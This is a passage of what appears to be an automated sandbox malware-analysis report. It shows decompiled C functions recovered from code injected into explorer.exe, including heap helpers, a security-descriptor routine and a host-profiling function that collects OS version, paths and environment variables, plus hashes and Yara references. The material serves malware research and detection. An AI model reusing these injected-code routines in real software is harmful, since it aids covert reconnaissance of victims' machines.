			E00F5B081(WCHAR* _a4) {

				return 0 | GetFileAttributesW(_a4) != 0xffffffff;
			}

0x00f5b09a

APIs

GetFileAttributesW.KERNELBASE(?,?,00F558CE,?), ref: 00F5B08C

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 79e745523152498da6f4139ab8f5d681830a4afcb5642dd287baa994430d7d38
Instruction ID: 9b092cfb442ca84d1879138c4e41fb59e48fd640ebc14cb598ae83bbe5e0fb4e
Opcode Fuzzy Hash: 79e745523152498da6f4139ab8f5d681830a4afcb5642dd287baa994430d7d38
Instruction Fuzzy Hash: 92C04C352282085FCB045F79EC458AD7B98EB096707554265F43AC72F1E662E9509A44

Uniqueness

Uniqueness Score: -1.00%

Function 00F5AC58, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5AC58(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xf897d8, 8, _a4); // executed
				return _t2;
			}

0x00f5ac66
0x00f5ac6d

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f6975a03c72c75f2a923ea7a0c7c23d366557898fe9cfe96e973751af3c5207b
Instruction ID: 3c98c536a3092203d6f6fb4708575a6c68119fad50072befeaf42c57eb388915
Opcode Fuzzy Hash: f6975a03c72c75f2a923ea7a0c7c23d366557898fe9cfe96e973751af3c5207b
Instruction Fuzzy Hash: F8B0923509830CFBDF011F85EC05AE87F69F704651F409010F60C454718AB264A4AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F582CF, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F582CF() {
				int _t3;

				_t3 = FindCloseChangeNotification( *0xf89790);
				if(_t3 != 0) {
					 *0xf89790 =  *0xf89790 & 0x00000000;
					return _t3;
				}
				return _t3;
			}

0x00f582da
0x00f582df
0x00f582e1
0x00000000
0x00f582e1
0x00f582e8

APIs

FindCloseChangeNotification.KERNELBASE(00F5865A), ref: 00F582DA

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 9ecda2f0edaa068c9b73ad5a65a2e94513525235d8afd965105c52b422952593
Instruction ID: ca9e09b2644c41cef5222b72226ce1a5955902f29f16e8cbb3edb34e45db7481
Opcode Fuzzy Hash: 9ecda2f0edaa068c9b73ad5a65a2e94513525235d8afd965105c52b422952593
Instruction Fuzzy Hash: ACC0923463820A8FDB008F11EC0DBB83BA4FB20756F880198D80683571CBB8C804FB04

Uniqueness

Uniqueness Score: -1.00%

Function 00F5ABD0, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5ABD0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0xf897d8 = _t1;
				return _t1;
			}

0x00f5abd9
0x00f5abdf
0x00f5abe4

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,00F548DB), ref: 00F5ABD9

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 5f378099fd8c0c020cc37619cc73bf382b0b9eae7ca0ecda22247595fb527b75
Instruction ID: 2d50e6aadd8f066f40c06d3669dfeb211a846a873714e369b885c4f72ce0ded0
Opcode Fuzzy Hash: 5f378099fd8c0c020cc37619cc73bf382b0b9eae7ca0ecda22247595fb527b75
Instruction Fuzzy Hash: B4B0127028430456F2501F205D06BE43590B300B02F301000B308981D4C6E010846B05

Uniqueness

Uniqueness Score: -1.00%

Function 00F60F0B, Relevance: 1.4, APIs: 1, Instructions: 151
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00F60F0B() {
				void* _v8;
				char _v12;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				short _v28;
				void* _v32;
				short _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				intOrPtr _v96;
				intOrPtr _v100;
				void _v104;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t73;
				intOrPtr _t75;
				intOrPtr _t78;
				intOrPtr _t81;
				void* _t83;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t94;
				intOrPtr _t96;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t105;
				intOrPtr _t106;

				_t98 = 8;
				memset( &_v104, 0, _t98 << 2);
				_push( &_v16);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(1);
				_push( &_v32);
				_t66 =  *0xf8974c; // 0x547f890
				_v8 = 0;
				_v24 = 1;
				_v40 = 0;
				_v36 = 0xf00;
				_v32 = 0;
				_v28 = 0x100;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				if( *((intOrPtr*)(_t66 + 0xc))() == 0) {
					L11:
					if(_v12 != 0) {
						_t75 =  *0xf8974c; // 0x547f890
						 *((intOrPtr*)(_t75 + 0x10))(_v12);
					}
					if(_v16 != 0) {
						_t73 =  *0xf8974c; // 0x547f890
						 *((intOrPtr*)(_t73 + 0x10))(_v16);
					}
					if(_v8 != 0) {
						_t71 =  *0xf89740; // 0x547f6c8
						 *((intOrPtr*)(_t71 + 0x34))(_v8);
					}
					if(_v20 != 0) {
						_t69 =  *0xf89740; // 0x547f6c8
						 *((intOrPtr*)(_t69 + 0x34))(_v20);
					}
					L22:
					return _v8;
				}
				_t105 = 2;
				_v76 = _v16;
				_t78 =  *0xf89720; // 0xf90000
				_t106 = 3;
				_v104 = 0x1fffff;
				_v100 = _t105;
				_v96 = _t106;
				_v84 = 0;
				_v80 = 5;
				_t100 =  *((intOrPtr*)(_t78 + 4));
				if(_t100 != 6 ||  *((intOrPtr*)(_t78 + 8)) < _t105) {
					if(_t100 < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t105);
					_push(_t105);
					_push( &_v40);
					_t94 =  *0xf8974c; // 0x547f890
					if( *((intOrPtr*)(_t94 + 0xc))() != 0) {
						_t96 = _v12;
						if(_t96 > 0) {
							_v72 = 0x1fffff;
							_v68 = _t105;
							_v64 = _t106;
							_v52 = 0;
							_v48 = _t105;
							_v44 = _t96;
							_v24 = _t105;
						}
						L7:
						_push( &_v20);
						_push(0);
						_push( &_v104);
						_push(_v24);
						_t81 =  *0xf8974c; // 0x547f890, executed
						if( *((intOrPtr*)(_t81 + 8))() != 0) {
							goto L11;
						}
						_t83 = LocalAlloc(0x40, 0x14);
						_v8 = _t83;
						if(_t83 == 0) {
							goto L11;
						}
						_push(1);
						_push(_t83);
						_t84 =  *0xf8974c; // 0x547f890
						if( *((intOrPtr*)(_t84 + 0x8c))() == 0) {
							goto L11;
						}
						_t86 =  *0xf8974c; // 0x547f890
						_push(0);
						_push(_v20);
						_push(1);
						_push(_v8);
						if( *((intOrPtr*)(_t86 + 0x90))() != 0) {
							if(_v12 != 0) {
								_t90 =  *0xf8974c; // 0x547f890
								 *((intOrPtr*)(_t90 + 0x10))(_v12);
							}
							_t88 =  *0xf8974c; // 0x547f890
							 *((intOrPtr*)(_t88 + 0x10))(_v16);
							goto L22;
						}
					}
					goto L11;
				}
			}

0x00f60f16
0x00f60f1e
0x00f60f23
0x00f60f24
0x00f60f25
0x00f60f26
0x00f60f27
0x00f60f28
0x00f60f29
0x00f60f2a
0x00f60f2e
0x00f60f2f
0x00f60f33
0x00f60f34
0x00f60f39
0x00f60f3c
0x00f60f3f
0x00f60f42
0x00f60f48
0x00f60f4b
0x00f60f51
0x00f60f54
0x00f60f57
0x00f60f5f
0x00f61030
0x00f61033
0x00f61038
0x00f6103d
0x00f6103d
0x00f61043
0x00f61048
0x00f6104d
0x00f6104d
0x00f61053
0x00f61058
0x00f6105d
0x00f6105d
0x00f61063
0x00f61068
0x00f6106d
0x00f6106d
0x00f6108d
0x00f61094
0x00f61094
0x00f60f6a
0x00f60f6d
0x00f60f70
0x00f60f75
0x00f60f76
0x00f60f7d
0x00f60f80
0x00f60f83
0x00f60f86
0x00f60f8d
0x00f60f93
0x00f60f9d
0x00000000
0x00000000
0x00000000
0x00f60f9f
0x00f60f9f
0x00f60fa2
0x00f60fa3
0x00f60fa4
0x00f60fa5
0x00f60fa6
0x00f60fa7
0x00f60fa8
0x00f60fa9
0x00f60fab
0x00f60fac
0x00f60fb0
0x00f60fb1
0x00f60fbb
0x00f60fbd
0x00f60fc2
0x00f60fc4
0x00f60fcb
0x00f60fce
0x00f60fd1
0x00f60fd4
0x00f60fd7
0x00f60fda
0x00f60fda
0x00f60fdd
0x00f60fe0
0x00f60fe1
0x00f60fe5
0x00f60fe6
0x00f60fe9
0x00f60ff3
0x00000000
0x00000000
0x00f60ff9
0x00f60fff
0x00f61004
0x00000000
0x00000000
0x00f61006
0x00f61008
0x00f61009
0x00f61016
0x00000000
0x00000000
0x00f61018
0x00f6101d
0x00f6101e
0x00f61021
0x00f61023
0x00f6102e
0x00f61075
0x00f6107a
0x00f6107f
0x00f6107f
0x00f61085
0x00f6108a
0x00000000
0x00f6108a
0x00f6102e
0x00000000
0x00f60fbb

APIs

LocalAlloc.KERNEL32(00000040,00000014), ref: 00F60FF9

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 3f2e70f8e5a0494ad55ebfb04d41ea13f85db2e0952b253d171aacc4aa9f6d89
Instruction ID: 5a824cd03c59849d5315ab5e4f39ac36fcc57cd83634ada23457832a0e0ef8b0
Opcode Fuzzy Hash: 3f2e70f8e5a0494ad55ebfb04d41ea13f85db2e0952b253d171aacc4aa9f6d89
Instruction Fuzzy Hash: FF519271E14249EFDF20CF99DC84AEEBBB9FF48350F18806AE515E6261D7709A40EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F61F51, Relevance: 1.4, APIs: 1, Instructions: 103
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F61F51(short __eax, WCHAR* _a4, intOrPtr _a8, short _a12) {
				char _v8;
				char _v12;
				WCHAR* _v16;
				void* __ebx;
				void* __esi;
				short _t31;
				intOrPtr _t38;
				char _t43;
				intOrPtr _t45;
				short _t49;
				short _t63;
				WCHAR* _t65;

				_t63 = 0;
				_t49 = __eax;
				_v12 = 0;
				_v8 = 0;
				_t65 = E00F5AC58(0x448);
				_v16 = _t65;
				if(_t65 != 0) {
					_t65[0x21a] = _t49;
					_t65[0x21c] = _a12;
					lstrcpynW(_t65, _a4, 0x200);
					if(_t49 != 1) {
						_t31 = E00F5AC58(0x100000);
						_t65[0x212] = _t31;
						if(_t31 != 0) {
							_t65[0x216] = 0x100000;
							if(_a8 == 0) {
								L18:
								return _t65;
							}
							E00F61CA8(_t65, _a8);
							L17:
							goto L18;
						}
						_t63 = 0;
						L8:
						if(_v8 != _t63) {
							E00F5AB81( &_v8, _t63);
						}
						L10:
						if(_t65[0x218] != _t63) {
							_t38 =  *0xf89740; // 0x547f6c8
							 *((intOrPtr*)(_t38 + 0x30))(_t65[0x218]);
						}
						_t66 =  &(_t65[0x212]);
						if(_t65[0x212] != _t63) {
							E00F5AB81(_t66, _t63);
						}
						E00F5AB81( &_v16, _t63);
						goto L1;
					}
					_t43 = E00F5D103(_a4,  &_v12); // executed
					_v8 = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					if(E00F6206C(_t65, _t43, _v12, _a8) < 0) {
						goto L8;
					}
					_t45 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t45 + 0x30))(_t65[0x218]);
					_t65[0x218] = 0;
					E00F5AB81( &_v8, 0);
					goto L17;
				}
				L1:
				return 0;
			}

0x00f61f5a
0x00f61f61
0x00f61f63
0x00f61f66
0x00f61f6e
0x00f61f71
0x00f61f76
0x00f61f8a
0x00f61f91
0x00f61f97
0x00f61fa0
0x00f61ff3
0x00f61ff9
0x00f62001
0x00f62054
0x00f6205a
0x00f62065
0x00000000
0x00f62065
0x00f6205f
0x00f62064
0x00000000
0x00f62064
0x00f62003
0x00f62005
0x00f62008
0x00f6200f
0x00f62015
0x00f62016
0x00f6201c
0x00f62024
0x00f62029
0x00f62029
0x00f6202c
0x00f62034
0x00f62038
0x00f6203e
0x00f62044
0x00000000
0x00f6204a
0x00f61fa9
0x00f61fb0
0x00f61fb5
0x00000000
0x00000000
0x00f61fca
0x00000000
0x00000000
0x00f61fd2
0x00f61fd7
0x00f61fdf
0x00f61fe5
0x00000000
0x00f61fea
0x00f61f78
0x00000000

APIs

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

lstrcpynW.KERNEL32(00000000,00000000,00000200,75088F70,00000000,00000000,00F580F9,?,00000000,00000000), ref: 00F61F97

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcpyn
String ID:
API String ID: 680773602-0
Opcode ID: 4be924f2d63aae2cd6843dd5acf79b0083b948a35ac98c8f4309d19ed0a63003
Instruction ID: 154afaa447720859a8243de99ae1e5e7e159c3461ad817b0a5fd38cc18b40935
Opcode Fuzzy Hash: 4be924f2d63aae2cd6843dd5acf79b0083b948a35ac98c8f4309d19ed0a63003
Instruction Fuzzy Hash: 2D31F572D01604FFCB219F64AC45E9EBBE8FB84321F20015AFA1497141E7319645FB54

Uniqueness

Uniqueness Score: -1.00%

Function 00F5CB24, Relevance: 1.3, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00F5CB24(void* __edx, intOrPtr* __esi, void* __fp0, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				void* _t32;
				signed int _t37;
				intOrPtr _t42;
				void* _t51;
				intOrPtr* _t53;
				void* _t54;
				void* _t61;

				_t61 = __fp0;
				_t53 = __esi;
				_t51 = __edx;
				_v8 = _v8 & 0x00000000;
				if( *__esi <= 0) {
					L7:
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					_t52 = _v8;
					_t32 = E00F5C3B2(_t51, _a4,  *((intOrPtr*)( *((intOrPtr*)(_t53 + 4)) + _v8 * 8))); // executed
					if(_t32 == 0) {
						_t42 = E00F5CE8A( *((intOrPtr*)( *((intOrPtr*)(_t53 + 4)) + 4 + _t52 * 8)));
						if(_t42 != 0 || GetLastError() != 0xd) {
							_v12 = _v12 & 0x00000000;
							_push(2);
							_push( &_v16);
							_push(_a4);
							_v16 = _t42;
							_t37 = 8; // executed
							E00F5C513(_t37,  *((intOrPtr*)( *((intOrPtr*)(_t53 + 4)) + _t52 * 8)), _t51, _t61); // executed
							_t54 = _t54 + 0xc;
						} else {
							E00F5CBB0( *((intOrPtr*)( *((intOrPtr*)(_t53 + 4)) + 4 + _t52 * 8)), _a4,  *((intOrPtr*)( *((intOrPtr*)(_t53 + 4)) + _t52 * 8))); // executed
						}
					}
					_v8 = _v8 + 1;
				} while (_v8 <  *_t53);
				goto L7;
			}

0x00f5cb24
0x00f5cb24
0x00f5cb24
0x00f5cb2a
0x00f5cb33
0x00f5cbab
0x00f5cbaf
0x00000000
0x00000000
0x00000000
0x00f5cb35
0x00f5cb35
0x00f5cb38
0x00f5cb41
0x00f5cb4a
0x00f5cb58
0x00f5cb5c
0x00f5cb85
0x00f5cb89
0x00f5cb8e
0x00f5cb8f
0x00f5cb92
0x00f5cb97
0x00f5cb98
0x00f5cb9d
0x00f5cb69
0x00f5cb76
0x00f5cb7c
0x00f5cb5c
0x00f5cba0
0x00f5cba6
0x00000000

APIs

Part of subcall function 00F5CE8A: SetLastError.KERNEL32(0000000D,00000000,00F73208,00F5C491), ref: 00F5CEC5

GetLastError.KERNEL32(00F90114,00000000,?,00F5817D), ref: 00F5CB5E

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 27534c999de73ebbe3273cb65ca913dc65412555cff9140d65790643e22347b9
Instruction ID: a57dd4b11c39b5cfb13ab5baad748737c651fa63ee67004e59da3cbe21e18241
Opcode Fuzzy Hash: 27534c999de73ebbe3273cb65ca913dc65412555cff9140d65790643e22347b9
Instruction Fuzzy Hash: 40118F39904205FFDB209F94D852A2973F5EB44365F208469EE428B261DB31ED49EB80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F5F695, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 284
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00F5F695(void* __fp0) {
				signed int _v8;
				struct _OSVERSIONINFOA* _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				char _v24;
				struct _SYSTEM_INFO _v60;
				char _v188;
				char _v704;
				char _v712;
				char _v3212;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t85;
				struct _OSVERSIONINFOA* _t86;
				void* _t95;
				intOrPtr _t96;
				intOrPtr _t98;
				intOrPtr _t102;
				intOrPtr _t104;
				void* _t105;
				intOrPtr _t111;
				short* _t113;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr _t129;
				intOrPtr _t134;
				intOrPtr _t137;
				intOrPtr _t140;
				intOrPtr _t144;
				intOrPtr _t158;
				intOrPtr _t161;
				intOrPtr _t164;
				intOrPtr _t166;
				signed int _t171;
				char* _t177;
				intOrPtr _t179;
				WCHAR* _t180;
				void* _t182;
				void* _t185;
				intOrPtr _t187;
				struct _OSVERSIONINFOA* _t203;
				char* _t208;
				char* _t209;
				char* _t210;
				void* _t212;
				WCHAR* _t215;
				struct _OSVERSIONINFOA* _t216;
				void* _t218;
				intOrPtr* _t220;
				void* _t238;

				_t238 = __fp0;
				_t85 =  *0xf89754; // 0x10000000
				_v16 = _v16 & 0x00000000;
				_v20 = _t85;
				_t86 = E00F5AC58(0x1ac4);
				_t203 = _t86;
				_v12 = _t203;
				if(_t203 == 0) {
					return _t86;
				}
				 *((intOrPtr*)(_t203 + 0x1640)) = GetCurrentProcessId();
				_t6 = _t203 + 0x648; // 0x648
				E00F6D8CE(GetTickCount() +  *((intOrPtr*)(_t203 + 0x1640)), _t6);
				_t185 = _t212;
				_t8 = _t203 + 0x1644; // 0x1644
				_t213 = _t8;
				if(GetModuleFileNameW(0, _t8, 0x105) != 0) {
					 *((intOrPtr*)(_t203 + 0x1854)) = E00F5B494(_t213);
				}
				 *((intOrPtr*)(_t203 + 0x110)) = E00F60DE3(_t185, GetCurrentProcess());
				_t95 = E00F611E9( *_t94);
				_pop(_t187);
				if(_t95 == 0) {
					_t96 = E00F60E43(_t187, _t203, _t213);
					__eflags = _t96;
					_t187 = (0 | _t96 > 0x00000000) + 1;
					__eflags = _t187;
					 *((intOrPtr*)(_t203 + 0x214)) = _t187;
				} else {
					 *((intOrPtr*)(_t203 + 0x214)) = 3;
				}
				_t15 = _t203 + 0x220; // 0x220
				 *((intOrPtr*)(_t203 + 0x218)) = E00F62DA5(_t187, _t15);
				_t98 = E00F62DFC(_t187);
				_push( &_v24);
				 *((intOrPtr*)(_t203 + 0x21c)) = _t98;
				_push( &_v8);
				 *(_t203 + 0x224) = _v20;
				_push( &_v704);
				_push( &_v16);
				_t24 = _t203 + 0x114; // 0x114
				_v16 = 0x80;
				_v8 = 0x100;
				_push( *((intOrPtr*)( *((intOrPtr*)(_t203 + 0x110)))));
				_t102 =  *0xf8974c; // 0x547f890
				_push(0);
				if( *((intOrPtr*)(_t102 + 0x68))() == 0) {
					GetLastError();
				}
				_t104 =  *0xf89728; // 0x547f820
				_t105 =  *((intOrPtr*)(_t104 + 0x3c))(0x1000);
				_t32 = _t203 + 0x228; // 0x228
				_t215 = _t32;
				 *(_t203 + 0x1850) = 0 | _t105 > 0x00000000;
				GetModuleFileNameW( *(_t203 + 0x224), _t215, 0x105);
				GetLastError();
				 *((intOrPtr*)(_t203 + 0x434)) = E00F5B494(_t215);
				_t36 = _t203 + 0x114; // 0x114
				_t111 = E00F61561(_t105 > 0, _t36);
				_t37 = _t203 + 0xb0; // 0xb0
				_t177 = _t37;
				 *((intOrPtr*)(_t203 + 0xac)) = _t111;
				E00F6165A(_t177, _t105, _t238, _t111);
				_t39 = _t203 + 0xd0; // 0xd0
				_t113 = _t39;
				if(_t177 != 0) {
					_t171 = MultiByteToWideChar(0, 0, _t177, 0xffffffff, _t113, 0x20);
					if(_t171 > 0) {
						 *((short*)(_t203 + 0xd0 + _t171 * 2)) = 0;
					}
				}
				_t198 = _t215;
				E00F5B92B(_t215, _t203 + 0x438);
				_t216 = _v12;
				E00F616DB(_t216 + 0x100c, _t238, E00F61785(0, _t177, E00F5ACD6(_t177)));
				 *((intOrPtr*)(_t216 + 0x101c)) = E00F6125C(GetCurrentProcess());
				memset(_t216, 0, 0x9c);
				_t220 = _t218 + 0x20;
				_t216->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t216);
				_t179 =  *0xf89740; // 0x547f6c8
				_v8 = _v8 & 0x00000000;
				if( *((intOrPtr*)(_t179 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t179 + 0x6c))(GetCurrentProcess(),  &_v8);
				}
				_t124 = _v8;
				 *((intOrPtr*)(_t216 + 0xa8)) = _t124;
				if(_t124 == 0) {
					GetSystemInfo( &_v60);
					_t126 = _v60.dwOemId & 0x0000ffff;
				} else {
					_t126 = 9;
				}
				_t180 = _t216 + 0x1020;
				 *(_t216 + 0x9c) = _t126;
				GetWindowsDirectoryW(_t180, 0x104);
				_t128 = E00F62CCE(_t198, 0x8cf);
				_push(0x104);
				_t200 =  &_v712;
				_push( &_v712);
				_v8 = _t128;
				_push(_t128);
				_t129 =  *0xf89740; // 0x547f6c8
				if( *((intOrPtr*)(_t129 + 0xe0))() == 0) {
					_t166 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t166 + 0xfc))(_v8, _t180);
				}
				E00F5BA86( &_v8);
				 *_t220 = 0x209;
				_push(_t216 + 0x1434);
				_t134 =  *0xf89740; // 0x547f6c8
				_t208 = L"USERPROFILE";
				_push(_t208);
				if( *((intOrPtr*)(_t134 + 0xe0))() == 0) {
					_t182 = _t216 + 0x1434;
					E00F5CE46(_t182, 0x105, L"%s\\%s", _t180);
					_t164 =  *0xf89740; // 0x547f6c8
					_t220 = _t220 + 0x14;
					 *((intOrPtr*)(_t164 + 0xfc))(_t208, _t182, "TEMP");
				}
				_push(0x20a);
				_push(_t216 + 0x122a);
				_t137 =  *0xf89740; // 0x547f6c8
				_t209 = L"TEMP";
				_push(_t209);
				if( *((intOrPtr*)(_t137 + 0xe0))() == 0) {
					_t161 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t161 + 0xfc))(_t209, _t216 + 0x1434);
				}
				_push(0x40);
				_push( &_v188);
				_t140 =  *0xf89740; // 0x547f6c8
				_t210 = L"SystemDrive";
				_push(_t210);
				if( *((intOrPtr*)(_t140 + 0xe0))() == 0) {
					_t158 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t158 + 0xfc))(_t210, L"C:");
				}
				_t144 =  *0xf89740; // 0x547f6c8
				_v12 = 0x7f;
				 *((intOrPtr*)(_t144 + 0xb0))(_t216 + 0x199c,  &_v12);
				E00F6D8CE(E00F61785(0, _t216 + 0x100c, E00F5ACD6(_t216 + 0x100c)),  &_v3212);
				E00F6D988( &_v3212, _t216 + 0x1858, 0x20);
				E00F5B4BE(_t216 + 0x1878, 1, 0x14, 0x1e,  &_v3212);
				 *((intOrPtr*)(_t216 + 0x1898)) = E00F5F450(_t200);
				return _t216;
			}

0x00f5f695
0x00f5f69e
0x00f5f6a3
0x00f5f6ad
0x00f5f6b0
0x00f5f6b5
0x00f5f6b8
0x00f5f6bd
0x00f5fa68
0x00f5fa68
0x00f5f6cb
0x00f5f6d1
0x00f5f6e5
0x00f5f6eb
0x00f5f6f2
0x00f5f6f2
0x00f5f703
0x00f5f70c
0x00f5f70c
0x00f5f71e
0x00f5f726
0x00f5f72c
0x00f5f72f
0x00f5f73d
0x00f5f744
0x00f5f749
0x00f5f749
0x00f5f74a
0x00f5f731
0x00f5f731
0x00f5f731
0x00f5f750
0x00f5f75b
0x00f5f761
0x00f5f769
0x00f5f76a
0x00f5f776
0x00f5f777
0x00f5f783
0x00f5f787
0x00f5f788
0x00f5f78f
0x00f5f79c
0x00f5f7a3
0x00f5f7a5
0x00f5f7aa
0x00f5f7b1
0x00f5f7b3
0x00f5f7b3
0x00f5f7b9
0x00f5f7c3
0x00f5f7ce
0x00f5f7ce
0x00f5f7db
0x00f5f7e1
0x00f5f7e7
0x00f5f7f4
0x00f5f7fa
0x00f5f801
0x00f5f806
0x00f5f806
0x00f5f80d
0x00f5f813
0x00f5f81a
0x00f5f81a
0x00f5f822
0x00f5f82e
0x00f5f836
0x00f5f83a
0x00f5f83a
0x00f5f836
0x00f5f848
0x00f5f84a
0x00f5f84f
0x00f5f868
0x00f5f88a
0x00f5f890
0x00f5f895
0x00f5f899
0x00f5f89b
0x00f5f8a1
0x00f5f8a7
0x00f5f8af
0x00f5f8b8
0x00f5f8b8
0x00f5f8bb
0x00f5f8be
0x00f5f8c6
0x00f5f8d1
0x00f5f8d7
0x00f5f8c8
0x00f5f8ca
0x00f5f8ca
0x00f5f8e1
0x00f5f8e8
0x00f5f8ef
0x00f5f8fa
0x00f5f900
0x00f5f901
0x00f5f907
0x00f5f908
0x00f5f90b
0x00f5f90c
0x00f5f919
0x00f5f91b
0x00f5f924
0x00f5f924
0x00f5f92e
0x00f5f939
0x00f5f940
0x00f5f941
0x00f5f946
0x00f5f94b
0x00f5f954
0x00f5f966
0x00f5f96d
0x00f5f972
0x00f5f977
0x00f5f97c
0x00f5f97c
0x00f5f982
0x00f5f98d
0x00f5f98e
0x00f5f993
0x00f5f998
0x00f5f9a1
0x00f5f9aa
0x00f5f9b0
0x00f5f9b0
0x00f5f9b6
0x00f5f9be
0x00f5f9bf
0x00f5f9c4
0x00f5f9c9
0x00f5f9d2
0x00f5f9d4
0x00f5f9df
0x00f5f9df
0x00f5f9f0
0x00f5f9f5
0x00f5f9fc
0x00f5fa22
0x00f5fa37
0x00f5fa4f
0x00f5fa5c
0x00000000

APIs

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

GetCurrentProcessId.KERNEL32 ref: 00F5F6C5
GetTickCount.KERNEL32 ref: 00F5F6D8
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 00F5F6FB
GetCurrentProcess.KERNEL32 ref: 00F5F712
GetLastError.KERNEL32 ref: 00F5F7B3
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 00F5F7E1
GetLastError.KERNEL32 ref: 00F5F7E7
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 00F5F82E
GetCurrentProcess.KERNEL32 ref: 00F5F876
memset.MSVCRT ref: 00F5F890
GetVersionExA.KERNEL32(?), ref: 00F5F89B
GetCurrentProcess.KERNEL32(00000000), ref: 00F5F8B5
GetSystemInfo.KERNEL32(?), ref: 00F5F8D1
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00F5F8EF

Strings

USERPROFILE, xrefs: 00F5F946, 00F5F94B, 00F5F97B
TEMP, xrefs: 00F5F956
TEMP, xrefs: 00F5F993, 00F5F998, 00F5F9AF
SystemDrive, xrefs: 00F5F9C4, 00F5F9C9, 00F5F9DE
%s\%s, xrefs: 00F5F95C

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharCountDirectoryHeapInfoMultiSystemTickVersionWideWindowsmemset
